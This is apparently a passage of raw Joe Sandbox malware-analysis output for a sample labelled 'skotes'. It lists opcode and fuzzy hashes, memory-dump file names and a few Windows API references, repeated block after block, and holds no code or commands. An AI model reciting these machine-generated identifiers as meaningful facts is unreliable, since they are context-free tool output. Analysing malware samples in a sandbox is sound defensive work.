                                                                                                                                                                                                                                                • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                • Instruction ID: ff57a01cdbbcb2b3a6a362e610cb417944d259b2441876015bf9b1ab11542f66
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8F14E71E012199FDF14CFA9C9806AEB7B1FF88314F25826ED919AB344D735AE01CB94
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,004CCF52,?,?,?,?,004CCF87,?,?,?,?,?,?,004CC4FD,?,00000001), ref: 004CCC03
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1802150274-0
                                                                                                                                                                                                                                                • Opcode ID: 26c4fc20c1fd518e5699b23b8abee6e183286a5462765743b7fbf373daf9c9b4
                                                                                                                                                                                                                                                • Instruction ID: 5dd4c88dfdd6f2d099645377daf7e0033ef48ad6d1a51208c806c5e5bbfadab6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26c4fc20c1fd518e5699b23b8abee6e183286a5462765743b7fbf373daf9c9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27D0223A602538A38A052B84EC08EADBB48CA01B603001016E90C232A0CA216C01ABD9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                • Instruction ID: 3714bfd0e8e9e1f80bfa1e50f3a255538881fc1840dace80864e1eaf9a91d115
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42519E302086C45AEF38876B88957BF779A9F11317F14051FE48AE7382CE1E9D4A835E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a5f307cf836db17a147b54c1547e2fe0c5c0f79ab9623336f20c3011a3e376c1
                                                                                                                                                                                                                                                • Instruction ID: 582f89829d3587bb769617de6b233ca870d380fef9053315351cfc6dc5abe2f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f307cf836db17a147b54c1547e2fe0c5c0f79ab9623336f20c3011a3e376c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C32260B3F515145BDB0CCB9DDCA27ECB2E3AFD8218B0E803DA40AE3345EA79D9159644
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d93839f1f1e2ad91127329a81d0e24a8daffd94ad61d7ff5fc99e8f7dc2a7d93
                                                                                                                                                                                                                                                • Instruction ID: 6dd3a7f95ff56c87396db5fa966afc1b7f5a06d0a1a3c7d818bbf525580ba824
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d93839f1f1e2ad91127329a81d0e24a8daffd94ad61d7ff5fc99e8f7dc2a7d93
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B15C31614608DFD724CF28C486B657BA1FF45364F258699EA99CF3A1C33DE982CB44
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2a09f6e6cbcb9116f1fe45f8cc8ddb1a608ccbaae21fe9da8cca835cf326734a
                                                                                                                                                                                                                                                • Instruction ID: c908d52d4256bb828bc29e264761d26167b862847c9c2f5467dcff98a6b555ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a09f6e6cbcb9116f1fe45f8cc8ddb1a608ccbaae21fe9da8cca835cf326734a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0812170A042458FDB15CF69D8907EEBBF5FB9A300F15466EC950A7353C3389949CBA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7a5bdf2b9f83b3f2f642da624d0822aafe5fedfa2ddf0bc319e636956ce887df
                                                                                                                                                                                                                                                • Instruction ID: ff37dfb64da6992bfee4b956467f3cae2c05a9babb0be4a0917e2e9931a6301d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a5bdf2b9f83b3f2f642da624d0822aafe5fedfa2ddf0bc319e636956ce887df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F421B673F204394B770CC57E8C522BDB6E1C78C541745823AE8A6EA2C1D96CD917E2E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 246a138629ff4769cb360780789b5e3d24636632d7a095f732c42456be6015c5
                                                                                                                                                                                                                                                • Instruction ID: dc7fc70b7e73ba86f080e1c377826cba69b66e40a0d32e6a06520f9fa4766a5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 246a138629ff4769cb360780789b5e3d24636632d7a095f732c42456be6015c5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9118A23F30C295B675C816D8C172BA95D2DBD825471F533AD826E7284E9A4DE13D290
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                • Instruction ID: 9505f6394ee8e6396c7378ce684d5b208035d300897bc0741e2a74f76910fc76
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B112B7720018A43E6089A3DC8B45B7A795EFC53617AC437FD3424F758DA2AD945960C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 790d12d191489a99c774c959d9baa333f24aecf7ec0daddb271a109e9b4aadfe
                                                                                                                                                                                                                                                • Instruction ID: e9a28c02311116fa02cb3e717d7d320a5e0f02669ce79d65dca4b78822b612b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 790d12d191489a99c774c959d9baa333f24aecf7ec0daddb271a109e9b4aadfe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDE08631281188BBCF397B2ADC0DD4D3B5AEB617C6F024815FC144A225CB29ED92C688
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                • Instruction ID: 4a55c1258439a648e9cad3dc7cd418de1e348aaaec5963208e37aec657dd70c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E08632911168EBCB15DB9AC50498AF3ECEB45B05B55009BF901D3150C274EE00C7D4
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 004E4877
                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 004E487F
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 004E4908
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004E4933
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 004E4988
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
